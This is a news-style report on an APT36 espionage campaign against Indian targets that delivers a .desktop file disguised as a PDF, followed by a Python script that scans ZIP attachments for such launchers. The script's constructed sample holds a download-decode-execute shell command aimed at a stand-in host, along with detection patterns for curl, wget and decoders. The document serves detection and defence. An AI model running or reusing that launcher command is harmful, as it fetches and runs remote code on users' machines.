Transparent Tribe (APT36) Launches New Espionage Campaign Targeting India
A sophisticated cyber espionage group known as Transparent Tribe (APT36) has been active since 2013, targeting entities in 27 countries, with a primary focus on India, Afghanistan, Germany, Iran, and Pakistan. The group's latest campaign was uncovered on August 1, 2025, and remains ongoing.
APT36 was first spotted in 2016 targeting Indian diplomats and military staff via phishing and watering hole attacks. The group has since expanded its operations to adjacent sectors and opportunistic targeting in other geographies, broadening its target set. In its latest campaign, APT36 uses a malicious archive 'Meeting_Notice_Ltr_ID1543ops.pdf_.zip' containing a disguised .desktop file that masquerades as a PDF but executes hidden commands via Bash, silently downloading and executing a hex-encoded payload. The analyzed malware is a suspicious 64-bit ELF executable for x86-64 with anomalies typical of malware packing, embedding the hardcoded C2 'modgovindia[.]space:4000'. APT36 establishes persistence via cron jobs and systemd service abuse, and contacts the C2 using DNS queries and UDP sockets for stealthy communication.
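The lure described above relies on a .desktop launcher whose visible name and icon claim to be a PDF while its Exec= line runs a shell that fetches and hex-decodes a payload. The following triage script is an added example, not code from the article or from any vendor's report: it parses .desktop files found inside a ZIP attachment and flags that combination of traits. The rule set, the sample launchers, and the host name c2.invalid are constructed for the example; only the defanged domain modgovindia[.]space comes from the article.

```python
"""Heuristic triage of .desktop launchers shipped inside mail attachments.

Added example (not from the article). Rules are an assumption derived from
the tradecraft described: document-like Name/Icon, a shell in Exec=, a
network download, and a hex/base64 decode step. Sample launchers below are
CONSTRUCTED; c2.invalid is a reserved, non-resolving host name.
"""
import io
import re
import zipfile
from configparser import ConfigParser, Error as ConfigError

# Defanged indicator published in the article; compared in both forms.
KNOWN_C2 = {"modgovindia[.]space"}

SHELL_RE = re.compile(r"(^|[\s/])(bash|sh|dash|zsh)(\s|$)")
DOWNLOAD_RE = re.compile(r"\b(curl|wget)\b")
DECODE_RE = re.compile(r"\b(xxd\s+-r|unhex|fromhex|base64\s+-d)\b")
DOC_NAME_RE = re.compile(r"\.(pdf|docx?|xlsx?)\b", re.IGNORECASE)

# Constructed sample mimicking the lure pattern; the host cannot resolve.
SAMPLE_LAUNCHER = """[Desktop Entry]
Type=Application
Name=Meeting_Notice_Ltr_ID1543ops.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -s http://c2.invalid/stage.hex | xxd -r -p > /tmp/.x && chmod +x /tmp/.x && /tmp/.x"
"""

# Constructed benign launcher: opens a local document with the desktop handler.
BENIGN_LAUNCHER = """[Desktop Entry]
Type=Application
Name=Quarterly_Report.pdf
Icon=application-pdf
Exec=xdg-open /home/user/Documents/Quarterly_Report.pdf
"""


def parse_desktop(text: str) -> dict:
    """Return the [Desktop Entry] keys; keys keep their case, no % interpolation."""
    cp = ConfigParser(interpolation=None)
    cp.optionxform = str  # .desktop keys are case-sensitive (Exec, Name, ...)
    cp.read_string(text)
    if not cp.has_section("Desktop Entry"):
        raise ValueError("no [Desktop Entry] section")
    return dict(cp["Desktop Entry"])


def triage_desktop(text: str) -> dict:
    """Apply the heuristic rules to one launcher and return findings + verdict."""
    entry = parse_desktop(text)
    name, icon, exec_line = entry.get("Name", ""), entry.get("Icon", ""), entry.get("Exec", "")
    findings = []
    claims_document = bool(DOC_NAME_RE.search(name)) or "pdf" in icon.lower()
    runs_shell = bool(SHELL_RE.search(exec_line))
    if claims_document and runs_shell:
        findings.append("masquerade: document-like Name/Icon but Exec runs a shell")
    if DOWNLOAD_RE.search(exec_line):
        findings.append("downloader: Exec fetches remote content")
    if DECODE_RE.search(exec_line):
        findings.append("decoder: Exec decodes an encoded payload before running it")
    if runs_shell and entry.get("Terminal", "").lower() == "false":
        findings.append("stealth: shell launched with Terminal=false (no visible window)")
    for c2 in KNOWN_C2:
        if c2 in exec_line or c2.replace("[.]", ".") in exec_line:
            findings.append(f"ioc: known C2 {c2}")
    return {"name": name, "findings": findings,
            "verdict": "suspicious" if findings else "benign"}


def scan_archive(zip_source) -> list:
    """Triage every .desktop member of a ZIP (path or file-like object)."""
    results = []
    with zipfile.ZipFile(zip_source) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".desktop"):
                continue
            text = zf.read(info).decode("utf-8", errors="replace")
            try:
                results.append((info.filename, triage_desktop(text)))
            except (ConfigError, ValueError) as exc:
                results.append((info.filename, {"verdict": "unparseable", "error": str(exc)}))
    return results


def demo() -> list:
    """Build a constructed in-memory archive with both launchers and scan it."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Meeting_Notice_Ltr_ID1543ops.pdf.desktop", SAMPLE_LAUNCHER)
        zf.writestr("Quarterly_Report.pdf.desktop", BENIGN_LAUNCHER)
    buf.seek(0)
    return scan_archive(buf)


if __name__ == "__main__":
    for member, result in demo():
        print(member, "->", result["verdict"])
        for finding in result.get("findings", []):
            print("   ", finding)
```

The masquerade rule is the one that matters most in practice: a legitimate launcher for a document calls a viewer such as xdg-open, never `bash -c` with a download pipeline, so that pairing alone is worth an alert even when the download host and decoder differ from the ones seen in this campaign.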
The majority of the victims of the APT36 campaign revealed in August 2025 are located in India. The group targets Indian government and defense entities via spear-phishing emails that deploy custom malware for persistent espionage.
Transparent Tribe (APT36) has been conducting cyber espionage operations since 2013, with a significant focus on Indian entities. Its latest campaign, uncovered in August 2025, uses novel methods to evade detection and maintain persistence. Security experts urge vigilance and robust cybersecurity measures to counter such advanced persistent threat groups.